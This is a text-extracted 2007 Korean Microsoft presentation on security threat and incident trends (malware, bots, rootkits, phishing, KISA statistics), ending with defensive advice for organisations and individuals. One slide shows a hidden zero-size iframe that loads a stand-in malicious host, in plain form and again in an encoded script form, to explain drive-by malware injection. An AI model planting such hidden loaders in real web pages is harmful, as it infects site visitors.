<4D F736F F F696E74202D D203120C3D6B1D920C1A4BAB8BAB8C8A320C0A7C7F9B0FA20C4A7C7D8BBE7B0ED20B5BFC7E220B1E8C8ABBCAE202E707

Similar documents
< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

2006_8_14 (8_17 updated) ms ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>

Windows 8에서 BioStar 1 설치하기


*2008년1월호진짜

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

TGDPX white paper

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

Microsoft PowerPoint - 권장 사양

<4D F736F F F696E74202D20C0FCBCBAC7D0202D20B1E2BEF720C1A4BAB820BAB8C8A3B8A620C0A7C7D120BEC7BCBAC4DAB5E520B4EBC0C0205BC8A3C8AF20B8F0B5E55D>

Æí¶÷4-¼Ö·ç¼Çc03ÖÁ¾š

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

!K_InDesginCS_NFH

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

Secure Programming Lecture1 : Introduction

Windows Live Hotmail Custom Domains Korea

MOD360: Microsoft Virtualization 360A Panel Discussion on Microsoft’s Virtualization Strategy

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

PowerPoint Template

1 법적 고지 사항 SK hynix Inc.는 사전 통보 없이 제품, 정보 및 사양을 변경할 권리를 보유합니다. 본 문서의 제품 및 사양은 참조용입니다. 본 문서의 모든 정보는 어떠한 형태의 보증 없이 있는 그대로 제공됩니다. 본 문서와 여기 포함된 모든 정보는 SK

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대

untitled

AhnLab_template

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3

목차 006/ 008/ 009/ 011/ 012/ 013/ 014/ Part 1_ 컴퓨터가 제대로 작동하지 않을 때 문제00_ 윈도우7 복구(초기화) 방법 안내 문제01_ 컴퓨터의 전원 버튼을 눌러도 아무 반응이 없어요. 문제02_ 전원을 누르면 팬(쿨러)이 돌아가는

암호내지

Ç×°ø¾ÈÀüÁ¤º¸³×Æ®¿öÅ©±¸Ãà¹æ¾È¿¡°üÇÑ¿¬±¸.hwp

<31305FBEC6C0CCC5DB2E687770>

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

1,000 AP 20,000 ZoneDirector IT 5, WLAN. ZoneFlex AP ZoneDirector. WLAN. WLAN AP,,,,,,., Wi-Fi. AP. PSK PC. VLAN WLAN.. ZoneDirector 5000 WLAN L

유포지탐지동향

*****

AhnLab_template

사용 설명서

untitled

목차 개요 3 섹션 1: 해결 과제 4 APT(지능형 지속 위협): 이전과 다른 위협 섹션 2: 기회 7 심층 방어 섹션 3: 이점 14 위험 감소 섹션 4: 결론 14 섹션 5: 참조 자료 15 섹션 6: 저자 소개 16 2

<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770>

2004 IRISPen 사용자 설명서-본문-용지크기 조정-폰트포함.PDF

Windows 10 General Announcement v1.0-KO

PowerPoint Presentation

<C0CCC8ADC1F82E687770>

ESET Endpoint Security

Spotlight on Oracle V10.x 트라이얼프로그램설치가이드 DELL SOFTWARE KOREA

사고란 무엇일까요? 03 사고는 왜 주의해야 할까요? 1) 사고의 피해 유형 개인정보가 유출될 경우, 명의 도용으로 인한 금전 피해 및 사생활(프라이버시) 침해 등의 피해가 발생할 수 있습니다. 065 사고란 생존하는 개인에 관한 정보 (성명 주민등록번호

5th-KOR-SANGFOR NGAF(CC)

Windows Storage Services Adoption And Futures

Tables of Contents 1. IT Trend 2. Cyber Attack Trends 3. Emerging Issue 1 - 지식정보유출 4. Emerging Issue 2 IE & Memory Hacking 지식보안산업예상 2

ActFax 4.31 Local Privilege Escalation Exploit


비디오 / 그래픽 아답터 네트워크 만약에 ArcGolbe를 사용하는 경우, 추가적인 디스크 공간 필요. ArcGlobe는 캐시파일을 생성하여 사용 24 비트 그래픽 가속기 Oepn GL 2.0 이상을 지원하는 비디오카드 최소 64 MB 이고 256 MB 이상을 메모리

Cloud Friendly System Architecture

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

CLX8380_KR.book

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

제목 레이아웃

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

ESET NOD32 Antivirus

좀비PC

AVG PC TuneUp User Manual

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉

Samsung SDS Enterprise Cloud Networking CDN Load Balancer WAN

<%DOC NAME%> User Manual

MOVE TO THE LEFT OF THE KILL CHAIN AND STOP THE BAD GUYS MOVE TO THE RIGHT

untitled

<30352D30312D3120BFB5B9AEB0E8BEE0C0C720C0CCC7D82E687770>

歯mp3사용설명서

PathEye 공식 블로그 다운로드 받으세요!! 지속적으로 업그래이드 됩니다. 여러분의 의견을 주시면 개발에 반영하겠 습니다.

(Microsoft PowerPoint - NRMWFKPIIYBC [\310\243\310\257 \270\360\265\345])

프로젝트관리시스템(PMS) 기능개선 검토회

Microsoft PowerPoint ISS_ ( , , v2.1).ppt

별지 제10호 서식

내용물 시작 3 구성품 4 MDA200 기본 사항 5 액세서리 6 헤드셋 연결 7 탁상 전화기: 연결 및 통화 8 탁상 전화기(표준) 8 탁상 전화기+ HL10 거치대와 전원 공급 장치(별도 구매) 10 탁상 전화기+ EHS 케이블 12 컴퓨터: 연결 및 통화 13 컴

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상

untitled

먼저 읽어 보세요! 주 의 : 화재의 위험을 줄이려면, 본 장비를 비 혹은 습기에 노출하지 않도록 하시기 바랍니다. 화재의 위험을 줄이려면, 본 장비를 모든 종류의 액체로부터 멀리하시기 바랍니다. 액체가 흐르거나 튈 염려가 없는 장소에 보관하시고, 장비 위에 어떤 종류

P2WW HNZ0

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for

Mailnara Business Plan 2013

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft PowerPoint - 차민석

컴퓨터관리2번째시간

<B0B3C0CE5043BAB8BEC8BCB3C1A4C6C4C0CF2E687770>

윈도우 비스타를 윈도우 7로 업그레이드 1단계 1 단계: Windows 7(윈도우 7)의 어떤 버전으로 업그레이드할 수 있습니까? 아래 표에서는 Windows 7(윈도우 7)로 업그레이드할 수 있는 Windows Vista(윈도우 비스타) 버전에 대해 설명합니다. 업그

국가정보보호백서 제1장 정보환경 변화와 정보보호 정보통신기술은 우리에게 보다 나은 미래를 제공해주는 원동력이자 현대사회에서 없어서는 안 될 필수불가결한 사회기반으로 여겨지고 있다. 또한 정보통신기술은 경제 성장의 원천이 되고 있으 며 사회 시스템의 효율성을

신종파밍악성코드분석 Bolaven

RHEV 2.2 인증서 만료 확인 및 갱신

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요? 3 Q5. 보안패치가됐는지어떻게확인하나요? 5 Q6. 스마트폰도랜섬웨

Transcription:

최근정보보호위협과 침해사고동향 김홍석보안프로그램매니저고객지원부한국마이크로소프트

해킹으로부터안전하고 바이러스걱정도안하고 보안취약점염려도없이 컴퓨터를가장안전하게사용하는 방법은? 컴퓨터를네트워크에연결하지않고 CD, 디스켓, USB 메모리를사용하지않는다

한국정보보호진흥원 (KISA) 2006. 12. * 정보통신부 Dynamic u-korea 정보보호강화사업결과물

특정정보나서비스를 대상으로한금전적탈취 단순호기심 명예심

출처 : Symantec, Symantec Internet Security Threat Report: Volume XI (2007 년 3 월 )

해킹, 바이러스전체피해건수감소 단순홈페이지변조피해감소 위험도증가스팸릴레이증가피싱경유지사고증가

궁극적목적은금전적이익 특정서비스 ( 게임 ) 이용자를대상으로한트로이잔피해가많아짐 특정웹게시판, 자료실등에은닉되어유포 게임 ID 와비밀번호를탈취 아이템사기 대량메일발송웜이줄어듦

루트킷을이용한감염사실은폐 백신프로그램에의한탐지방지 파일, 프로세스, 레지스트리숨김 웜 + 바이러스 + 봇 + 스파이웨어 + 트로이잔융합 악성코드제작은날로쉬워짐

3972 611 746 10764 964 533 2175 기타바이러스트로이잔웜 4117 2005 2006

하루 100 개이상의변종이탐지됨 악성봇관리용 C&C 다중화 루트킷을이용한봇 C&C 은닉 스팸메일발송, 악성코드유포외에금전적보상요구형 (ransom) DDoS

출처 : Microsoft, Microsoft Security Intelligence Report (2006 년 10 월 )

출처 : Microsoft, Microsoft Security Intelligence Report (2006 년 10 월 )

출처 : Microsoft, Microsoft Security Intelligence Report (2006 년 10 월 )

출처 : Microsoft, Microsoft Security Intelligence Report (2006 년 10 월 )

단순홈페이지변조피해감소 웹서버를통한제로데이공격발생 중국으로부터의해킹사고지속 특정정보수집전용악성코드유포 게임또는인지도높은사이트해킹 카페, 블로그를통한악성코드유포 피싱경유지, 스팸릴레이사고지속적증가 기존해킹기법과융합된스파이피싱등으로발전 개인정보탈취

인코딩전 <IFRAME SRC="http://evilsite.xxx/ou t.php?s_id=1" WIDTH=0 HEIGHT=0 BORDER=0 STYLE="display:none"></IFRA ME> 인코딩후 <script type="text/javascript"> xx('%264djgsbnf%2631tsd%264 E%2633iuuq%264B00fwjmtjuf/y yy0pvu/qiq%264gt%60je%264e2 %2633%2631XJEUI%264E1%2631I FJHIU%264E1%2631CPSEFS%264E 1%2631TUZMF%264E%2633ejtqmb z%264bopof%2633%264f%264d0j GSBNF%264F'); </script>

대량스팸메일을통한피싱의보편화 이미지스팸 피싱사이트제작툴킷사용증가 국내개인정보수집목적피싱발생 전화사기대폭증가

귀찮은존재 지우기위해시간을소모함 주의를기울이면피해를보지않는다? 심각한보안위협 반드시대응솔루션을사용해야함

사고건수 금융기관 은행, 보험회사등 전자상거래업체 기타정부기관, 온라인메신저업체, 검색사이트등 2006 년 1 12 월, KISA 에서접수처리한사고분석

기업 3,689 대학 1,094 비영리 714 연구소 16 네트워크 307 기타 20,988 2006 년 1 12 월, KISA 에서접수처리한사고분석

웹사이트이용전파, 금전적목적지속 Windows Vista 보안기능무력화시도 VoIP 악용악성코드출현 특정프로그램취약점겨냥공격증가 사용자를기만하는사회공학기법의악성코드증가 UCC 보안위협등장

SQL injection 취약점, 파일업로드취약점공격지속 Web Proxy 를이용한공격증가 ActiveX 컨트롤이용해킹증가 국내홈페이지대상의 DoS 공격증가웹 20 2.0 환경대응필요 Ajax, SOAP, RSS 등

관공서, 금융기관사칭전화사기지속 호스트파일변조를통하여사용자가알아채기어려워짐 피싱필터보급증가

출처 : Symantec, Symantec Internet Security Threat Report: Volume XI (2007 년 3 월 )

운영체제 (OS) 네트워크서버, 웹애플리케이션웹브라우저애드온및플러그인동영상, 음악재생기메일클라이언트인스턴트메신저, 채팅데이터베이스서버압축프로그램파일뷰어문서작성기바이러스백신 네트워크기능파일입출력기능을갖춘거의모든프로그램과시스템에보안과관련한결함이있을가능성

출처 : Symantec, Symantec Internet Security Threat Report: Volume XI (2007 년 3 월 )

출처 : Symantec, Symantec Internet Security Threat Report: Volume XI (2007 년 3 월 )

정의 (KrCERT/CC) PC에암호를설정하지않음보안업데이트를하지않음인터넷을통해웜등악성코드에감염되는시간 1,000여회테스트평균 2007 년 3 월현재 Windows XP SP1: 26분 45초 Windows 2000 SP4: 32분 47초 출처 : 한국정보보호진흥원, "2007 년 03 월해킹바이러스통계및분석월보"

1. 다중보안, 심층보안구현 패치관리, 백신, 방화벽, 침입탐지, 침입보호 2. 불필요한서비스중지 3. 외부에제공되는서비스호스트에패치지속설치 4. 보안기준에못미치는클라이언트를네트워크접속시강제차단접속시강제차단 5. 암호정책강화 6 위험가능성이있는메일첨부파일을서버에서 6. 위험가능성이있는메일첨부파일을서버에서차단또는제거

7. 업무에필요한최소권한만할당 8. 긴급보안대응프로세스수립및훈련 9. 임원진에보안예산할당필요역설 10. 외부로나가는 (outbound) 패킷필터링 11. 애플리케이션관리시스템사용 12. 악성소프트웨어에대해직원교육 사회공학기법에대해인지하도록함 IT 관리부서는최신동향파악

1. 자동업데이트켜기 2. 개인방화벽사용 3. 백신소프트웨어사용 주기적으로최신패턴을업데이트 4. 암호강화 5. 믿을수없는출처의메일삭제 6. 의심스런웹사이트방문또는파일다운로드금지

2007 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.